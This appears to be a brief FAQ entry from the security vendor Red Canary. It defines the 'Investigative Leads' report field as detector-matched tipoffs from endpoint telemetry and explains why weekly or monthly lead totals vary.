What is the definition of the field "Investigative Leads" referenced in various reports?
Investigative leads are tipoffs are analytical leads generated from matches made from raw telemetry data and alerts against our list of detectors. Tipoffs are then deduplicated and suppressions are cross checked before they are sent for review by Detection Engineering.
This field is referenced in the reports below:
- Background: Red Canary by the Numbers
- Background: Intelligence & Detection Engineering
The variation in investigative lead totals (Ex: week to week or month to month) can be attributed to various factors. The biggest are:
- Variations in the total number of endpoints reporting data within the time period specified
- New detectors being introduced during the time period specified